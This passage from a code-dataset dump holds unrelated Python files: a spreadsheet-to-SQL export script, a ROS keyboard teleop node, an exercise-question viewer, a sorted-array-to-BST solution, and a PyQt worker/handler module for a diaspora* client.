c5.value, c6.value, c7.value, c8.value,\n c9.value))\n sql = \"INSERT INTO aut (sorsz,datum,ceg,kezd,hely,musor,kontakt,megjegyzes,helykod) VALUES ( NULL,\"\n c2db = c2.value.split('/') # A 0 az időpont/helyszín, az 1 pedig a műsor.\n idopont = re.match('[0-9][0-9].?[0-9][0-9]', c2db[0])\n try:\n c2db[1] = c2db[1].strip()\n musor = sqlescapy.sqlescape(c2db[1])\n # musor = re.escape(c2db[1])\n except IndexError:\n musor = 'Nincs megadva műsor.'\n logging.debug('IndexError - Nincs megadva műsor.')\n if idopont:\n logging.debug('Van időpont!')\n # kezdes = c1.value.replace(hour=int(idopont.group()[:2]), minute=00)\n kezdes = idopont.group()\n hely = c2db[0].replace(kezdes, '', 1)\n hely = hely.strip()\n # ely elejéről levesszük a spacet\n logging.debug('Helyszín eredménye: ' + hely)\n else:\n kezdes = 'Nincs megadva kezdés.'\n hely = c2db[0]\n logging.debug('Kezdés eredménye: ' + hely)\n # kezdes = c1.value.replace(hour=00, minute=00)\n if c8.value:\n kontakt = c8.value\n else:\n kontakt = ''\n if c9.value:\n megjegyzes = c9.value\n else:\n megjegyzes = ''\n datum = d\n logging.debug('Kezdési időpont kialakult: ' + str(kezdes))\n sql += '\"'\n sql += str(datum) # Dátum\n sql += '\",'\n sql += '\"24\",\"' # Cég\n sql += kezdes # Kezdes\n sql += '\",\"'\n sql += hely.strip() # Hely\n sql += '\",\"'\n sql += musor.strip() # Musor\n sql += '\",\"'\n sql += kontakt.strip() # Kontakt\n sql += '\",\"'\n sql += megjegyzes.strip() # Megjegyzés\n sql += '\",\"'\n sql += str(0) # helykod\n sql += '\");\\n'\n logging.debug(sql)\n f.write(sql)\n i = i + 1 # feldolgozott sorok száma.\n print('{} sor feldolgozva.'.format(i))\nf.close()\nprint('Fájl kiírása befejezve.')\nveg = time.time() - kezd\nprint('{:.5f}. sec alatt lefutott'.format(veg))\n","sub_path":"aut/python/2021_1_sql.py","file_name":"2021_1_sql.py","file_ext":"py","file_size_in_byte":5586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"575525342","text":"#!/usr/bin/env python\n# Software License Agreement (BSD License)\n#\n# Copyright (c) 2008, Willow Garage, Inc.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n\nimport keyboard # using module keyboard\nimport rospy\nfrom geometry_msgs.msg import Twist\n\ndef controlador_robo():\n\n rospy.init_node('controlador_robo')\n\n pub = rospy.Publisher('cmd_vel_mux/input/teleop', Twist, queue_size=10)\n vel_twist = Twist()\n rate = rospy.Rate(10)\n\n k_lin = 1\n k_ang = 0.7\n\n while True:\n vel_linear = 0\n vel_angular = 0\n key_pressed = False\n try:\n if keyboard.is_pressed('up'):\n key_pressed = True\n vel_linear += 1\n if keyboard.is_pressed('down'):\n key_pressed = True\n vel_linear -= 1\n if keyboard.is_pressed('left'):\n key_pressed = True\n vel_angular += 1\n if keyboard.is_pressed('right'):\n key_pressed = True\n vel_angular -= 1\n\n if key_pressed:\n vel_twist.linear.x = vel_linear * k_lin\n vel_twist.angular.z = vel_angular * k_ang\n pub.publish(vel_twist)\n except:\n break\n rate.sleep()\n\n\nif __name__ == '__main__':\n try:\n controlador_robo()\n except rospy.ROSInterruptException:\n pass\n","sub_path":"src/controlador_robo.py","file_name":"controlador_robo.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"647285468","text":"\r\n\r\n'''\r\nList all questions and hints from 100exercises.txt\r\n\r\nThe file is a bit of a mess, so it's not easy to split it.\r\n3.\tQuestions\r\n\r\nQuestions are divided by #-----\r\nSometimes end with #---\r\nThey should contain:\r\nQuestion:\r\nHints:\r\nExample:\r\nSolution:\r\n'''\r\n\r\nfilename = '100exercises.txt'\r\nallquestions = []\r\n\r\ndef main():\r\n start = False\r\n question = []\r\n with open(filename ,'r') as f:\r\n for line in f:\r\n if not start:\r\n if '3.\tQuestions' in line:\r\n #start here:\r\n start = True\r\n else:\r\n if '#--------------------' in line:\r\n if len(question) >2:\r\n allquestions.append(question)\r\n question = []\r\n else:\r\n line = line.strip()\r\n if len(line) > 2:\r\n question.append(line)\r\n\r\n while True:\r\n sel = input('Pick a question number (1,{})or (q)uit: '.format(len(allquestions)))\r\n if sel == 'q':\r\n exit()\r\n else:\r\n try:\r\n val = int(sel)-1\r\n result = getQuestion(val)\r\n playQuestion(result)\r\n except ValueError:\r\n print(\"That's not an int!\")\r\n \r\n \r\ndef playQuestion(question):\r\n while True:\r\n print('(q)uestion, (h)int, (e)xample, (s)olution, (a)ll, e(x)it')\r\n sel = input('Pick one: ')\r\n if sel == 'q':\r\n printPart(question,'Question:')\r\n elif sel == 'h':\r\n printPart(question,'Hints:')\r\n elif sel == 'e':\r\n printPart(question,'Example:')\r\n elif sel == 's':\r\n printPart(question,'Solution:')\r\n elif sel == 'a':\r\n printQuestion(question)\r\n elif sel == 'x':\r\n return\r\n \r\ndef printPart(question,part):\r\n try:\r\n mypart = question[part]\r\n print()\r\n print(part)\r\n for l in mypart:\r\n print(l)\r\n print()\r\n except KeyError:\r\n print('{} missing'.format(part))\r\n\r\ndef printQuestion(question) :\r\n for k,v in question.items():\r\n print(k)\r\n for l in v:\r\n print(l)\r\n print(\"--\")\r\n\r\ndef getQuestion(q_number):\r\n if q_number > len(allquestions):\r\n return False\r\n q = allquestions[q_number]\r\n\r\n list_block_titles = ['Question:','Hints:','Example:','Solution:']\r\n myblock = []\r\n\r\n question = {} \r\n block_name = 'noname'\r\n for line in q:\r\n # https://stackoverflow.com/questions/3389574/check-if-multiple-strings-exist-in-another-string\r\n match = next((x for x in list_block_titles if x in line), False)\r\n if match:\r\n question[block_name] = myblock\r\n block_name = match\r\n myblock = []\r\n else:\r\n myblock.append(line)\r\n question[block_name] = myblock\r\n\r\n return question\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n","sub_path":"easylist.py","file_name":"easylist.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"364674947","text":"from common.tree import TreeNode, deserialize_tree, draw_tree\n\n\nclass Solution(object):\n def sortedArrayToBST(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: TreeNode\n\n ACE\n\n creates different solution where subtrees favor adding to the right\n \"\"\"\n def helper(a, lo, hi):\n if hi < lo:\n return None\n mid = (lo + hi) // 2\n node = TreeNode(a[mid])\n node.left = helper(a, lo, mid - 1)\n node.right = helper(a, mid + 1, hi)\n return node\n return helper(nums, 0, len(nums) - 1)\n\n def sortedArrayToBSTV1(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: TreeNode\n\n ACE\n\n creates solution like what is shown in problem\n \"\"\"\n def helper(a, lo, hi):\n if hi <= lo:\n return None\n mid = (lo + hi) // 2\n node = TreeNode(a[mid])\n node.left = helper(a, lo, mid)\n node.right = helper(a, mid + 1, hi)\n return node\n return helper(nums, 0, len(nums))\n\n\nif __name__ == '__main__':\n s = Solution()\n tests = [\n [-10,-3,0,5,9]\n ]\n for l in tests:\n # t = deserialize_tree(ser)\n t = s.sortedArrayToBST(l)\n draw_tree(t)\n # assert res == exp\n","sub_path":"108_convert_sorted_array_to_binary_search_tree.py","file_name":"108_convert_sorted_array_to_binary_search_tree.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"522426210","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QFileDialog, QInputDialog\nfrom PyQt5.QtCore import QObject, QThreadPool, QRunnable, pyqtSignal, pyqtSlot\n\n\"\"\" Image resolver / caching \"\"\"\nfrom classes.resolver import resolver\n\n\"\"\" Diaspy \"\"\"\nimport diaspy\nfrom diaspy.errors import DiaspyError\n\n\"\"\" Exceptions \"\"\"\nimport requests\n\"\"\"ReadTimeout requires minimal version of python3-requests 2.11 \nhttps://pypi.python.org/pypi/requests/2.11.1 \"\"\"\nversion = requests.__version__.split('.')\nif int(version[0]) == 2 and int(version[1]) >= 11:\n\tfrom requests import ConnectionError, ReadTimeout\nelse:\n\tfrom requests import ConnectionError\n\tclass ReadTimeout(Exception):\n\t\tpass\n\nclass stream(diaspy.streams.Stream):\n\tdef __init__(self, connection, location=''):\n\t\tself.connection = connection\n\t\tself.location = location\n\t\tdiaspy.streams.Stream.__init__(self, self.connection, location=self.location, fetch=False)\n\n\t\tself.layout = None\n\t\tself.post_widgets = {}\n\n\t\t\"\"\" TODO implement this\n\t\t\tIf more() doesn't give more posts then block future calls.\n\t\t\tSo it doesn't keep requesting when there are no more posts.\n\t\t\"\"\"\n\t\tself.no_more = False\n\n\tdef set_layout(self, layout):\n\t\tself.layout = layout\n\nclass aspects(diaspy.streams.Aspects):\n\tdef __init__(self, connection):\n\t\tself.connection = connection\n\t\tdiaspy.streams.Aspects.__init__(self, self.connection, fetch=False)\n\n\t\tself.layout = None\n\t\tself.post_widgets = {}\n\t\tself.no_more = False\n\n\tdef set_layout(self, layout):\n\t\tself.layout = layout\n\nclass handler(QObject):\n\t\"\"\"\n\tThreads and Object storage.\n\t\"\"\"\n\tmessage = pyqtSignal(tuple) # title, message\n\tconnected = pyqtSignal(bool)\n\tauth_status = pyqtSignal(bool)\n\tuserdata_ready = pyqtSignal()\n\ttag_followings_ready = pyqtSignal()\n\tnew_stream = pyqtSignal(str) # str: name\n\tnew_notifications_obj = pyqtSignal()\n\tnew_people_obj = pyqtSignal(str) # str: guid\n\tdef __init__(self):\n\t\tQObject.__init__(self)\n\n\t\tself.connection = None\n\t\tself.search = None\n\n\t\t# Cache people data by guid { guid: peope obj }\n\t\tself.people = {} # will contain people data, inc streams TODO move to people page.\n\t\tself.people_handle_to_guid = {} # key: handle, value: guid\n\n\t\tself.notifications = None\n\n\t\t# Thread pools\n\t\tself.connection_pool = QThreadPool()\n\t\tself.connection_pool.setMaxThreadCount(2)\n\n\t\tself.stream_pool = QThreadPool()\n\t\tself.stream_pool.setMaxThreadCount(3)\n\n\t\tself.notification_pool = QThreadPool()\n\t\tself.notification_pool.setMaxThreadCount(2)\n\n\t\tself.people_pool = QThreadPool()\n\t\tself.people_pool.setMaxThreadCount(2)\n\n\t\tself.people_stream_pool = QThreadPool()\n\t\tself.people_stream_pool.setMaxThreadCount(1)\n\n\t\tself.tag_followings = None\n\t\tself.userdata = None\n\t\tself.contacts = None # expects diaspy.people.Contacts(connection)\n\t\tself.res = None\n\t\tself.publisher = None\n\n\tdef set_contacts(self):\n\t\t# Just init, so connection is there and we are ready to use it.\n\t\tself.contacts = diaspy.people.Contacts(self.connection, fetch=False)\n\n\tdef add_people_obj(self, guid, people_obj):\n\t\tif people_obj and guid:\n\t\t\tself.people.update( { guid: people_obj } )\n\t\t\tif people_obj.data['handle']: # TODO if requested through guid, there is no diaspora_id but there should be in data\n\t\t\t\tself.people_handle_to_guid.update( { people_obj.data['handle'] : guid } )\n\t\t\tself.new_people_obj.emit(guid)\n\n\tdef set_notifications_obj(self, notifications_obj):\n\t\tif notifications_obj:\n\t\t\tself.notifications = notifications_obj\n\t\t\tself.new_notifications_obj.emit()\n\n\tdef set_stream(self, name, stream):\n\t\tif stream:\n\t\t\tself.stream[name] = stream\n\t\t\tself.new_stream.emit(name)\n\n\tdef set_connection(self, connection):\n\t\tif connection:\n\t\t\tself.connection = connection\n\t\t\tself.search = diaspy.search.Search( connection )\n\n\tdef if_connected(self):\n\t\tprint(\"called diaspy_handler.if_connected()\") # DEBUG\n\t\tif self.connection:\n\t\t\tself.res = resolver( self.connection.pod ) # set resolver for images\n\t\t\tself.publisher = diaspy.publisher.Publisher( self.connection )\n\t\t\tself.connected.emit(True)\n\t\telse:\n\t\t\tself.connected.emit(False)\n\n\tdef connect(self, config):\n\t\tprint(\"called diaspy_handler.connect()\") # DEBUG\n\t\tworker = connection_worker('connect', config=config)\n\t\tworker.signals.new_result.connect(self.set_connection)\n\t\tworker.signals.finished.connect(self.if_connected)\n\t\tself.connection_pool.start(worker)\t\n\n\tdef disconnect(self):\n\t\tself.connection.logout()\n\t\tself.connection = None\n\t\tself.res = None\n\n\tdef login(self):\n\t\tworker = connection_worker('login', connection=self.connection)\n\t\tworker.signals.status_change.connect( self.auth_status.emit )\n\t\tself.connection_pool.start(worker)\n\n\tdef set_user_data(self, userdata):\n\t\tif userdata:\n\t\t\t#self.userdata = userdata# TODO\n\t\t\tself.userdata_ready.emit()\n\n\tdef get_user_data(self):\n\t\tworker = connection_worker('get_user_data', connection=self.connection)\n\t\tworker.signals.new_result.connect( self.set_user_data )\n\t\tself.connection_pool.start(worker)\n\n\tdef set_tag_followings(self, tag_followings):\n\t\tif tag_followings:\n\t\t\tself.tag_followings = tag_followings\n\t\t\tself.tag_followings_ready.emit()\n\n\tdef get_tag_followings(self):\n\t\tworker = connection_worker('get_tag_followings', connection=self.connection)\n\t\tworker.signals.new_result.connect( self.set_tag_followings )\n\t\tself.connection_pool.start(worker)\n\n\tdef init_notifications(self):\n\t\tself.notifications = notifications(self.connection.__repr__())\n\n\tdef is_connected(self):\n\t\tif self.connection:\n\t\t\treturn True\n\t\treturn False\n\n\"\"\" Post worker \"\"\"\nclass post_signals(QObject):\n\tfinished = pyqtSignal()\n\texception = pyqtSignal(str)\n\tnew_post = pyqtSignal(object) # diaspy.models.Post\n\tnew_comment = pyqtSignal(object) # diaspy.models.Comment\n\tsuccess = pyqtSignal()\n\n\tdef disconnect(self):\n\t\tself.finished.disconnect()\n\t\tself.exception.disconnect()\n\t\tself.new_post.disconnect()\n\nclass post_worker(QRunnable):\n\tdef __init__(self, action, connection=None, post=None, guid=None, id=None, interaction=None, vote_answer_id=None, comment_markdown=None, delete_comment_id=None):\n\t\tsuper(post_worker, self).__init__()\n\t\tself.action = action.lower()\n\t\tself._interaction = interaction\n\t\tself.vote_answer_id = vote_answer_id\n\t\tself.delete_comment_id = delete_comment_id\n\t\tself.comment_markdown = comment_markdown\n\t\tself.__connection = connection\n\t\tself.post = post\n\t\tself.guid = guid\n\t\tself.id = id\n\t\tself.signals = post_signals()\n\n\tdef get(self):\n\t\ttry:\n\t\t\tif self.guid:\n\t\t\t\tpost = diaspy.models.Post(self.__connection, guid=self.guid)\n\t\t\telif self.id:\n\t\t\t\tpost = diaspy.models.Post(self.__connection, id=self.id)\n\t\t\telse:\n\t\t\t\tpass # raise error\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\texcept diaspy.errors.PostError as err:\n\t\t\tprint(\"Could not get post guid:{}, id:{}, err:{}\".format(self.guid, self.id, err)) #DEBUG\n\t\t\tself.signals.exception.emit(\"Could not get post guid:{}, id:{}, err:{}\".format(self.guid, self.id, err))\n\t\telse:\n\t\t\tself.signals.new_post.emit( post )\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef interaction(self):\n\t\t\"\"\" needs to have self._interaction and self.post set\n\t\tself._interaction should be a str containing one of the \n\t\tfollowing:\n\n\t\t\tlike\n\t\t\tunlike\n\t\t\tsubscribe\n\t\t\tunsubscribe\n\t\t\treshare\n\t\t\thide\n\t\t\tdelete\n\t\t\tmute\n\t\t\treport\n\t\t\tvote_poll\n\n\t\tself.post should be a diaspy.models.Post() object\n\t\t\"\"\"\t\n\n\t\ttry:\n\t\t\tif self._interaction == 'like': self.post.like()\n\t\t\telif self._interaction == 'update': self.post.update() # also updates comments\n\t\t\telif self._interaction == 'vote_poll': self.post.vote_poll( self.vote_answer_id ) # requires answer_id\n\t\t\telif self._interaction == 'unlike': self.post.delete_like()\n\t\t\telif self._interaction == 'subscribe': self.post.subscribe()\n\t\t\telif self._interaction == 'unsubscribe': self.post.unsubscribe()\n\t\t\telif self._interaction == 'reshare': self.post.reshare()\n\t\t\telif self._interaction == 'hide': self.post.hide()\n\t\t\telif self._interaction == 'delete': self.post.delete()\n\t\t\telif self._interaction == 'mute': self.post.mute()\n\t\t\telif self._interaction == 'report': self.post.report()\n\t\t\telif self._interaction == 'delete_comment': self.post.comments.delete_comment(self.delete_comment_id)\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error, could not {} post: {}\".format(self._interaction, err))\n\t\texcept diaspy.errors.PostError as err: # probably post is deleted.\n\t\t\tself.signals.exception.emit(\"PostError: could not {} post: {}\".format(self._interaction, err))\n\t\telse:\n\t\t\tself.signals.success.emit()\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef comment(self):\n\t\ttry:\n\t\t\tc = self.post.comments.comment(text=self.comment_markdown)\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error, could comment on post: {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_comment.emit( c )\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef run(self):\n\t\tprint(\"called post_worker.run() {} {}\".format(self.action, self._interaction))#DEBUG\n\t\tactions = {\n\t\t\t'get'\t\t\t: self.get,\n\t\t\t'interaction'\t: self.interaction,\n\t\t\t'comment'\t\t: self.comment\n\t\t}[self.action]()\n\n\"\"\" Stream worker \"\"\"\nclass stream_signals(QObject):\n\tfinished = pyqtSignal()\n\texception = pyqtSignal(str)\n\tnew_stream = pyqtSignal(object) # object: diaspy.stream.Generic()\n\tnew_post = pyqtSignal(object) # object: diaspy.models.Post()\n\tnew_data = pyqtSignal(str) # str: name\n\nclass stream_worker(QRunnable):\n\tprovider_display_name = 'LionsTooth (development)'\n\tdef __init__(self, action, connection=None, name='', location='', stream=None, post_data=None, aspect_ids_filter=None):\n\t\tsuper(stream_worker, self).__init__()\n\t\tself.action = action.lower()\n\t\tself.location = location\n\t\tself.name = name\n\t\tself.aspect_ids_filter = aspect_ids_filter\n\n\t\t\"\"\" self.post_data = {\n\t\t\t'text'\t\t\t: str(markdown), \n\t\t\t'aspect_ids'\t: [ids], \n\t\t\t'photos\t\t\t: None, \n\t\t\t'photo'\t\t\t: '',\n\t\t\t'poll_question'\t: 'poll_question',\n\t\t\t'poll_answers'\t: ['answer0', 'answer1', ..]\n\t\t} \"\"\"\n\t\tself.post_data = post_data\n\t\tself.__connection = connection\n\t\tself.stream = stream\n\t\tself.signals = stream_signals()\n\n\tdef new_aspects(self):\n\t\ttry:\n\t\t\tprint(\"stream_worker->new_aspects()\")#DEBUG\n\t\t\tnew_stream = aspects(self.__connection)\n\t\t\t#new_stream.fill()\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\texcept DiaspyError as err:\n\t\t\tself.signals.exception.emit(\"Diaspy error: {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_stream.emit(new_stream)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef aspects_filter(self):# used on Aspects stream\n\t\ttry:\n\t\t\tself.stream.filter( self.aspect_ids_filter )\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef new(self):\n\t\ttry:\n\t\t\tnew_stream = stream(self.__connection, location=self.location)\n\t\t\tnew_stream.fill()\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\texcept DiaspyError as err:\n\t\t\tself.signals.exception.emit(\"Diaspy error: {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_stream.emit(new_stream)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef fill(self):\n\t\ttry:\n\t\t\tself.stream.fill()\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_data.emit(self.name)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef more(self):\n\t\ttry:\n\t\t\tself.stream.more()\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_data.emit(self.name)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef update(self):\n\t\ttry:\n\t\t\tself.stream.update()\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_data.emit(self.name)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef post(self):\n\t\ttry:\n\t\t\tself.post = self.stream.post(\n\t\t\t\ttext=self.post_data['text'], \n\t\t\t\taspect_ids=self.post_data['aspect_ids'], \n\t\t\t\tphotos=self.post_data['photos'], \n\t\t\t\tphoto=self.post_data['photo'],\n\t\t\t\tpoll_question=self.post_data['poll_question'],\n\t\t\t\tpoll_answers=self.post_data['poll_answers'],\n\t\t\t\tprovider_display_name=self.provider_display_name )\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_post.emit( self.post )\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef run(self):\n\t\tprint(\"called stream_worker.run() {}\".format(self.action))#DEBUG\n\t\tactions = {\n\t\t\t'new'\t\t\t: self.new,\n\t\t\t'post'\t\t\t: self.post,\n\t\t\t'fill'\t\t\t: self.fill,\n\t\t\t'more'\t\t\t: self.more,\n\t\t\t'update'\t\t: self.update,\n\t\t\t'new_aspects'\t: self.new_aspects,\n\t\t\t'aspects_filter': self.aspects_filter\n\t\t}[self.action]()\n\n\"\"\" people worker \"\"\"\nclass people_signals(QObject):\n\tfinished = pyqtSignal()\n\texception = pyqtSignal(str)\n\tnew_obj = pyqtSignal(str, object) # str: guid, object: diaspy.people.User\n\tnew_data = pyqtSignal(str) # str: guid\n\nclass people_worker(QRunnable):\n\tdef __init__(self, action, guid=None, diaspora_id=None, connection=None, people_obj=None):\n\t\tsuper(people_worker, self).__init__()\n\t\tself.action = action\n\t\tself.guid = guid\n\t\tself.diaspora_id = diaspora_id\n\t\tself.people_obj = people_obj\n\t\tself.__connection = connection\n\t\tself.signals = people_signals()\n\n\tdef add_people_obj(self):\n\t\ttry:\n\t\t\tpeople_obj = diaspy.people.User(self.__connection, guid=self.guid, handle=self.diaspora_id, fetch='data')\n\t\t\tpeople_obj.getPhotos() # TODO?\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_obj.emit(people_obj.data['guid'], people_obj)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef get_photos(self):\n\t\ttry:\n\t\t\tself.people_obj.getPhotos()\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef get_userdata(self):\n\t\ttry:\n\t\t\tself.people_obj.fetchguid(fetch_stream=False)\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_data.emit(self.guid)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef fetch_stream(self):\n\t\ttry:\n\t\t\tself.people_obj._fetchstream()\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_data.emit(self.guid)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef run(self):\n\t\tprint(\"called people_worker.run() {}\".format(self.action))#DEBUG\n\t\tactions = {\n\t\t\t'add_people_obj'\t: self.add_people_obj,\n\t\t\t'get_userdata'\t\t: self.get_userdata,\n\t\t\t'fetch_stream'\t\t: self.fetch_stream,\n\t\t\t'get_photos'\t\t: self.get_photos\n\t\t}[self.action]()\n\n\"\"\" Connection worker \"\"\"\nclass connection_signals(QObject):\n\tfinished = pyqtSignal()\n\texception = pyqtSignal(str)\n\tnew_result = pyqtSignal(object)\n\tstatus_change = pyqtSignal(bool)\n\nclass connection_worker(QRunnable):\n\tdef __init__(self, action, connection=None, config=None):\n\t\tsuper(connection_worker, self).__init__()\n\t\tself.action = action.lower() # make sure it's always lowercase\n\t\tself.__connection = connection\n\t\tself.__config = config\n\t\tself.signals = connection_signals()\n\n\tdef connect(self):\n\t\tprint(\"called connection_worker.connect()\")#DEBUG\n\t\ttry:\n\t\t\tpod = \"https://{}\".format(self.__config['pod'])\n\t\t\tconnection = diaspy.connection.Connection(pod=pod, username=self.__config['user'], password=self.__config['pass'])\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_result.emit(connection)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef login(self):\n\t\ttry:\n\t\t\tself.__connection.login()\n\t\texcept diaspy.errors.LoginError as err:\n\t\t\tself.signals.exception.emit(\"login() failed: {}\".format(err))\n\t\t\tself.signals.status_change.emit(False)\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\t\tself.signals.status_change.emit(False)\n\t\telse:\n\t\t\tself.signals.status_change.emit(True)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef get_user_data(self):\n\t\ttry:\n\t\t\tuserdata = self.__connection.getUserData()\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error on getUserData(): {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_result.emit(userdata)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef get_tag_followings(self):\n\t\ttry:\n\t\t\t#following_tags = self.__connection.getTagFollowings()\n\t\t\tfollowing_tags = diaspy.tags.Tags(self.__connection)\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error on getTagFollowings(): {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_result.emit(following_tags)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef run(self):\n\t\tprint(\"called connection_worker.run() {}\".format(self.action)) # DEBUG\n\t\tactions = {\n\t\t\t'connect'\t\t\t\t: self.connect,\n\t\t\t'login'\t\t\t\t\t: self.login,\n\t\t\t'get_user_data'\t\t\t: self.get_user_data,\n\t\t\t'get_tag_followings'\t: self.get_tag_followings\n\t\t}[self.action]()\n\n\"\"\" notification worker \"\"\"\nclass notifications_signals(QObject):\n\tfinished = pyqtSignal()\n\texception = pyqtSignal(str)\n\tnew_obj = pyqtSignal(object) # object: diaspy.notifications.Notifications\n\tnew_data = pyqtSignal()\n\nclass notifications_worker(QRunnable):\n\tdef __init__(self, action, connection=None, notifications_obj=None):\n\t\tsuper(notifications_worker, self).__init__()\n\t\tself.action = action\n\t\tself.__connection = connection\n\t\tself.signals = notifications_signals()\n\t\tself.notifications = notifications_obj\n\n\tdef new(self):\n\t\ttry:\n\t\t\tnew_notifications = diaspy.notifications.Notifications(self.__connection)\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error on getTagFollowings(): {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_obj.emit(new_notifications)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef more(self):\n\t\ttry:\n\t\t\tself.notifications.more()\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error on getTagFollowings(): {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_data.emit()\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef update(self):\n\t\ttry:\n\t\t\tself.notifications.update()\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error on getTagFollowings(): {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_data.emit()\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef run(self):\n\t\tprint(\"called notifications_worker.run() {}\".format(self.action))#DEBUG\n\t\tactions = {\n\t\t\t'new'\t\t: self.new,\n\t\t\t'more'\t\t: self.more,\n\t\t\t'update'\t: self.update\n\t\t}[self.action]()\n","sub_path":"classes/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":18842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"574097979","text":"\"\"\"\n * MIT License\n *\n * Copyright (c) 2019 Arpit Aggarwal Markose Jacob\n *\n * Permission is hereby granted, free of charge, to any person obtaining a\n * copy of this software and associated documentation files (the \"Software\"),\n * to deal in the Software without restriction, including without\n * limitation the rights to use, copy, modify, merge, publish, distribute,\n * sublicense, and/or sell copies of the Software, and to permit persons to\n * whom the Software is furnished to do so, subject to the following\n * conditions:\n *\n * The above copyright notice and this permission notice shall be included\n * in all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n * THE AUTHORS OR COPYRIGHT HOLDERS BE 